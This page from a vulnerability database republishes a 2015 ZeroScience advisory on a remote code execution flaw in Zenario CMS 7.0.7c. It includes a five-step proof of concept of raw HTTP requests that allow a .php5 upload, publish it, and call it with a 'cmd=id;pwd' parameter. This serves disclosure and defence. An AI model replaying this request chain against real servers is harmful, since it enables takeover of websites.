Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Zenario CMS 7.0.7c Remote Code Execution Vulnerability

🗓️ 17 Nov 2015 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 32 Views

Zenario CMS 7.0.7c remote code execution vulnerability, allows arbitrary PHP code executio

Code
<html><body><p>Zenario CMS 7.0.7c Remote Code Execution Vulnerability


Vendor: Tribal Ltd.
Product web page: http://www.zenar.io
Affected version: &lt;= 7.0.7c and 7.1.0 (svn)

Summary: Zenario is a web-based content management system for sites
with one or many languages. It's designed to grow with your site,
adding extranet, online database and custom functionality when you
need it.

Desc: The vulnerability is caused due to the improper verification
of uploaded files via the Document upload script using 'Filedata' POST
parameter which allows of arbitrary files being uploaded in '/public/downloads/'
following a publicaly generated link for access where the admin first
needs to add the file extension in the allowed list. This can be exploited
to execute arbitrary PHP code by uploading a malicious PHP script file
and execute system commands.

Tested on: Ubuntu 14.04 LTS
           PHP 5.5.9-1ubuntu4.1
           Zend Engine v2.5.0
           Zend OPcache v7.0.3
           MySQL/5.5.37


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5280
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5280.php

Vendor: http://zenar.io/zenario-707d


27.10.2015

--


----------------------
1. Add php5 file type:

GET http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&amp;fromCType=html#zenario__administration/panels/file_types HTTP/1.1

POST /zenario/admin/ajax.php?_json=1&amp;_ab=1&amp;path=zenario_file_type HTTP/1.1
Host: 192.168.0.17
Connection: keep-alive
Content-Length: 516
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&amp;fromCType=html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&amp;_confirm=&amp;_box={"key":{"id":""},"tabs":{"details":{"edit_mode":{"on":1},"fields":{"type":{"current_value":"php5"},"mime_type":{"current_value":"application/octet-stream"}}}},"_sync":{"cache_dir":"ab_PBtBxW05_mPQDMgpv","password":"/L9HLsICPXzTD93VPn4Ou2Yw6HW6f4CPMFANLol7rcI=","iv":"7XoL6dLYAaMfqXgy7DfOeQ==","session":false}}


---------------
2. Upload file:

POST /zenario/ajax.php?__pluginClassName__=undefined&amp;__path__=zenario_document_upload&amp;method_call=handleAdminBoxAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 458
Origin: http://192.168.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
X_FILENAME: phpinfo.php5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUrDf3o8emcPIM8oD
Accept: */*
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="id"

12
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="fileUpload"

1
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php5"
Content-Type: application/octet-stream


------WebKitFormBoundaryUrDf3o8emcPIM8oD--



------------------------
3. Save and verify file:

POST /zenario/admin/ajax.php?_json=1&amp;_ab=1&amp;path=zenario_document_upload&amp;id=12 HTTP/1.1
Host: 192.168.0.17
Content-Length: 530
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&amp;_confirm=&amp;_box={"key":{"id":"12","fileUpload":1},"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"_display_value":"phpinfo.php5","current_value":"~79fa169880192652f933c1834aae09f40c4fc39c~2Fphpinfo.php5"}}}},"_sync":{"cache_dir":"ab_uMwuijj5_YP_0GAuZ","password":"/NUErtsIJtkXJXJqRr0pbt8oqAIUqz0GVdjJung5J/4=","session":false}}


------------------------
4. Generate public link:

POST /zenario/ajax.php?__pluginClassName__=zenario_common_features&amp;__path__=zenario__content/panels/documents&amp;method_call=handleOrganizerPanelAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 28
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

id=27&amp;generate_public_link=1


----------------
5. Execute code:

GET http://192.168.0.17/zenario/public/downloads/RvoId/phpinfo.php5?cmd=id;pwd HTTP/1.1
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Nov 2015 00:00Current
6.1Medium risk
Vulners AI Score6.1
zenario cmsremote code executionarbitrary filespublicly accessiblevendor tribal ltdversion 7.0.7cubuntu 14.04 ltsphp 5.5.9vulnerability discoveredgjoko krstic
32